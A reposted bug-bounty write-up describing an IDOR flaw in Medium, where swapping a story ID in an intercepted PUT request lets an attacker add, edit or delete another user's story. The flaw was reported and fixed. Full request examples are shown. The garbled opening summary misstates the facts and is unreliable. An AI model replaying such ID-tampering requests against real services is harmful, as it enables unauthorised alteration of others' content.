Writing User Stories For System Requirements
Update and Delete any Story of any user on Medium
The hacker hacked Facebook CEO Mark Zuckerberg and Google CEO Sundar Pichai. He posted a $250 bounty on Medium. He added his own story to the site without the consent of the target. He then added the target's story to his publication. The hacker added a bounty for a total of $350 to fix the bug. The bounty is now $1,000 and users can edit and delete their own stories using the "Add story to publication" button.
@ ajdumanhug
Allan Jay DumanhugFounder & Chief Executive Officer
Before the end of this year, Two well-known people was hacked. Mark Zuckerberg (CEO) of Facebook and Sundar Pichai (CEO) of Google and I was thinking what if it's time for me to hack Barack Obama. But, I know that isn't easy.
So, I decided to use my big brain to think my way out!
Looking for a new angle… Then, I found the "Request Story" button hiding in the 'ellipsis' or 'more' icon.
But, there's a problem. They, need to approve my request to add their story into my publication and that's absolutely impossible. But apparently, I can add my own story into my publication without further ado.
My goal here is to add any story of another user into my publication without their consent and I did that using the "Add story to publication" button.
While I'm adding my own story to my publication, I intercepted the HTTP Request to modify the story ID.
My Story ID: 2a4b6810c12d
Story ID of the target: 1a3b579c101a
The HTTP Request:
PUT /testphzxc/2a4b6810c12d HTTP/1.1
Host: medium.com
Connection: keep-alive
Content-Length: 25
Accept: application/json
Origin: https://medium.com
X-XSRF-Token: {Redacted}
X-Obvious-CID: web
User-Agent: {Redacted}
Content-Type: application/json
Referer: {Redacted}
Accept-Encoding: gzip, deflate, sdch, br
Accept-Language: en-US,en;q=0.8,nb;q=0.6
Cookie: {Redacted}
{"postStatus":"APPROVED"} In the line where the PUT method is located, you will see the ID of my story. And I will remove that ID and put the ID of the target's story.
Updated HTTP Request:
PUT /testphzxc/ 1a3b579c101a HTTP/1.1
Host: medium.com
Connection: keep-alive
Content-Length: 25
Accept: application/json
Origin: https://medium.com
X-XSRF-Token: {Redacted}
X-Obvious-CID: web
User-Agent: {Redacted}
Content-Type: application/json
Referer: {Redacted}
Accept-Encoding: gzip, deflate, sdch, br
Accept-Language: en-US,en;q=0.8,nb;q=0.6
Cookie: {Redacted}
{"postStatus":"APPROVED"} Of course, like what I've just mentioned above, the story will automatically added to my publication without their consent. That is because of:
{"postStatus":"APPROVED"} Then *Poof*. The Target's story was added to my publication.
Now What? Because the story was added to my publication, I am now able to edit his/her story or delete it.
Well, instead of attacking Mr. Obama's blog, I reported it to Medium.
They fixed it and rewarded me with a $250 bounty but I want more because I found multiple bugs in my report. First, Bypass the Request Story and Two, Update and Delete any story. Then, they added the previous bounty with a $100 bounty for a total of $350 bounty.
Tags
# medium# bug-bounty# idor# bypassing# hacking
Writing User Stories For System Requirements
Source: https://hackernoon.com/update-and-delete-any-story-of-any-user-on-medium-8b6a609c9bbe
Posted by: hillparented.blogspot.com
0 Response to "Writing User Stories For System Requirements"
Post a Comment